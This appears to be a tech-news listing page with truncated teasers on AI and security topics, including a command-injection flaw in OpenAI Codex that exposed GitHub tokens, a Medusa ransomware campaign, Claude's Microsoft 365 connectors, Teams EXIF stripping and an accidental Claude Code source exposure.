The rise of AI coding assistants has simplified developer workflows, but a recent discovery shows those conveniences can carry serious risk. Researchers at BeyondTrust found a critical command-injection vulnerability in OpenAI Codex that could be exploited to steal GitHub access tokens. The flaw demonstrates how an overlooked parsing detail — a branch name passed into a container setup script —
Category: Artificial Intelligent
OpenAI, ChatGPT, Claude, Gemini, Grok, DeepSeek, Meta AI, Le Chat, DALL-E, Midjourney, Stable Diffusion, Sora, BERT, T5, GPT-4, GPT-4o, GPT-5, Claude 3.5 Sonnet, Claude 3 Opus, Claude 4.5 Sonnet, Claude 4.5 Opus, Gemini 1.5 Pro, Gemini Ultra, Gemini 3, Llama 3, Mistral Large, DeepSeek-R1, AI in cybersecurity
Microsoft Links Medusa Ransomware Affiliate to Zero-Day Exploitation Campaign
Microsoft’s recent analysis tying a Medusa ransomware affiliate to a campaign that leveraged zero-day vulnerabilities has put a renewed spotlight on the evolving tactics of extortion groups and the threat posed by previously unknown software flaws. For security teams and executives, the announcement is a reminder that threat actors are combining rapid vulnerability exploitation with tried-and-true ransomware playbooks to increase
Anthropic opens Microsoft 365 connectors to all Claude plans — what it means for users
Anthropic has quietly broadened access to one of Claude’s most practical integrations: the Microsoft 365 connector. Once reserved for Team and Enterprise subscribers, the connector is now available across every Claude plan — including the free tier — enabling Claude to read and search content stored in Outlook, OneDrive, SharePoint, Teams and Calendar for users tied to an organization’s Microsoft
Microsoft strips EXIF metadata from Teams images to protect employee privacy
On March 2026’s feature rollout, Microsoft updated Teams to automatically remove EXIF metadata from images shared in chats and channels. The change aims to prevent accidental leaks of GPS coordinates, device details, and time stamps—data that can be exploited for targeted attacks or unwanted location disclosure. The move is part of a broader push to bake privacy and security into
Anthropic’s Claude Leak: 8,000 Takedown Requests After an Accidental Source-Code Exposure
Anthropic has scrambled to contain the fallout after an accidental exposure of the complete source code for its Claude family of AI tools. The company issued roughly 8,000 copyright takedown requests to remove copies and adaptations circulating on code-hosting sites and mirrors, responding to a wave of reposts and forks that appeared within hours of the initial disclosure. Although Anthropic
Inside the Claude Code Leak: What Anthropic’s Accidental Release Reveals
Anthropic, the AI company behind the Claude family of agents, suffered an unexpected exposure that rippled across the developer community and the wider AI market. Earlier today, a sizable JavaScript source map file—bundled with a public npm release—made internal implementation details of Claude Code visible to anyone who downloaded it. What began as a packaging mistake quickly became a public





